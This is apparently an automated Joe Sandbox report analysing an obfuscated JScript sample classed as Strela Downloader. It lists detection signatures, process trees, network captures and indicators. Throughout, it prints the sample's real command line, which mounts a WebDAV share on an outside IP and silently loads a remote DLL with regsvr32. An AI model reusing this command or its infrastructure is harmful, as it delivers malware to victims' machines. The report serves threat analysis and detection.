Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
11029977736728949.js

Overview

General Information

Sample name:11029977736728949.js
Analysis ID:1578417
MD5:2b7b95b432043bbc1ee308a9ccf92d05
SHA1:d09bd8e5637c73e5efdf174c1e66293b7d5a6ad5
SHA256:42bfeea223feb276651c6563aab89a039c6e84c828fe5d5e45a002a8058da5d4
Tags:jsuser-kupschke
Infos:

Detection

Strela Downloader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 3808 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 4812 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4584 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 5688 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 3808JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_3808.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js", ProcessId: 3808, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 5688, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3808, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dll, ProcessId: 4812, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js", ProcessId: 3808, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4584, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 5688, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4584, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 5688, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 193.143.1.231:8888
      Source: Joe Sandbox ViewIP Address: 193.143.1.231 193.143.1.231
      Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: net.exe, 00000004.00000002.1705998521.0000016144E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/
      Source: net.exe, 00000004.00000002.1705998521.0000016144E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/%o
      Source: net.exe, 00000004.00000002.1705998521.0000016144E52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/=o
      Source: net.exe, 00000004.00000002.1705998521.0000016144E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/tem

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_3808.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3808, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 11029977736728949.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal72.rans.troj.spyw.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 1700Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: net.exe, 00000004.00000002.1705998521.0000016144E1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: net.exe, 00000004.00000002.1705998521.0000016144E79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid AccountsWindows Management Instrumentation12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1578417 Sample: 11029977736728949.js Startdate: 19/12/2024 Architecture: WINDOWS Score: 72 24 Yara detected Strela Downloader 2->24 26 Uses known network protocols on non-standard ports 2->26 28 Sigma detected: WScript or CScript Dropper 2->28 8 wscript.exe 1 1 2->8         started        process3 signatures4 30 JScript performs obfuscated calls to suspicious functions 8->30 32 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->32 34 Gathers information about network shares 8->34 11 cmd.exe 1 8->11         started        process5 signatures6 36 Gathers information about network shares 11->36 14 cmd.exe 1 11->14         started        17 conhost.exe 11->17         started        process7 signatures8 38 Gathers information about network shares 14->38 19 net.exe 1 14->19         started        process9 dnsIp10 22 193.143.1.231, 49730, 8888 BITWEB-ASRU unknown 19->22

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      11029977736728949.js5%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://193.143.1.231:8888/=onet.exe, 00000004.00000002.1705998521.0000016144E52000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        http://193.143.1.231:8888/%onet.exe, 00000004.00000002.1705998521.0000016144E52000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://193.143.1.231:8888/net.exe, 00000004.00000002.1705998521.0000016144E52000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://193.143.1.231:8888/temnet.exe, 00000004.00000002.1705998521.0000016144E1C000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              193.143.1.231
              unknownunknown
              57271BITWEB-ASRUtrue
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1578417
              Start date and time:2024-12-19 17:08:43 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 2m 2s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Without Instrumentation
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:11029977736728949.js
              Detection:MAL
              Classification:mal72.rans.troj.spyw.evad.winJS@8/0@0/1
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Stop behavior analysis, all processes terminated
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 11029977736728949.js
              TimeTypeDescription
              11:09:37API Interceptor1x Sleep call for process: net.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              193.143.1.23122054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231:8888/
              22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231:8888/
              18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231:8888/
              18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231:8888/
              2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231:8888/
              2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231:8888/
              126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
              • 193.143.1.231:8888/140341625623863.dll
              126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
              • 193.143.1.231:8888/140341625623863.dll
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              BITWEB-ASRU22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231
              22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231
              https://courtscali.com/Get hashmaliciousUnknownBrowse
              • 193.143.1.14
              18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231
              18452302672446430694.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231
              2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231
              2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
              • 193.143.1.231
              126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
              • 193.143.1.231
              126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
              • 193.143.1.231
              No context
              No context
              No created / dropped files found
              File type:ASCII text, with very long lines (65536), with no line terminators
              Entropy (8bit):4.966544567798586
              TrID:
                File name:11029977736728949.js
                File size:141'532 bytes
                MD5:2b7b95b432043bbc1ee308a9ccf92d05
                SHA1:d09bd8e5637c73e5efdf174c1e66293b7d5a6ad5
                SHA256:42bfeea223feb276651c6563aab89a039c6e84c828fe5d5e45a002a8058da5d4
                SHA512:560b9e8c3f13ffb610e37d0ff14ac18985d11439a24bbdbface33a381ae8c768aad4502d09023ac3effb0ba28783b127c723bda49107c6e41cc6faafc410e5c0
                SSDEEP:1536:VJ7nYqsRmMOXmIPLOvDaC5SJyuLeKyLkMVpUwp9jFsSE5HfHlo9d6B:VdnYqeRwmS5eKyIMVpU0jFsSE5H/sY
                TLSH:0AD3CA1F5308E3C24796F9BC04878326299A9686CE4E56FD7735CE4E9812C6F04973FA
                File Content Preview:function wgjdbgis(){this[vyrggpivg+zeyerelcf+zznxdnrkn+nnerwshea](jzjnnwi+dhmco+tqreg+cebdwx+dkvpnzdfg+nnerwshea+dhmco+spbho+htywmyv+ntgfoffjf+kvqfsllu+jgzmbv+nnerwshea+nnerwshea+zznxdnrkn+vyrggpivg+osevgm+dskgqn+jgzmbv+axjzcfg+zeyerelcf+abrtvv+ntgfoffjf+
                Icon Hash:68d69b8bb6aa9a86
                TimestampSource PortDest PortSource IPDest IP
                Dec 19, 2024 17:09:36.384435892 CET497308888192.168.2.4193.143.1.231
                Dec 19, 2024 17:09:36.505552053 CET888849730193.143.1.231192.168.2.4
                Dec 19, 2024 17:09:36.505958080 CET497308888192.168.2.4193.143.1.231
                Dec 19, 2024 17:09:36.506812096 CET497308888192.168.2.4193.143.1.231
                Dec 19, 2024 17:09:36.628473043 CET888849730193.143.1.231192.168.2.4
                Dec 19, 2024 17:09:37.964297056 CET888849730193.143.1.231192.168.2.4
                Dec 19, 2024 17:09:38.018228054 CET497308888192.168.2.4193.143.1.231
                Dec 19, 2024 17:09:38.020252943 CET497308888192.168.2.4193.143.1.231
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.449730193.143.1.23188885688C:\Windows\System32\net.exe
                TimestampBytes transferredDirectionData
                Dec 19, 2024 17:09:36.506812096 CET107OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: DavClnt
                translate: f
                Host: 193.143.1.231:8888
                Dec 19, 2024 17:09:37.964297056 CET237INHTTP/1.1 500 Internal Server Error
                Server: nginx/1.22.1
                Date: Thu, 19 Dec 2024 16:09:37 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 22
                Connection: keep-alive
                X-Content-Type-Options: nosniff
                Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                Data Ascii: Internal server error


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:11:09:35
                Start date:19/12/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\11029977736728949.js"
                Imagebase:0x7ff771ce0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:1
                Start time:11:09:35
                Start date:19/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\2496869677155.dll
                Imagebase:0x7ff74df60000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:11:09:35
                Start date:19/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:11:09:35
                Start date:19/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff74df60000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:11:09:35
                Start date:19/12/2024
                Path:C:\Windows\System32\net.exe
                Wow64 process (32bit):false
                Commandline:net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff782660000
                File size:59'904 bytes
                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                No disassembly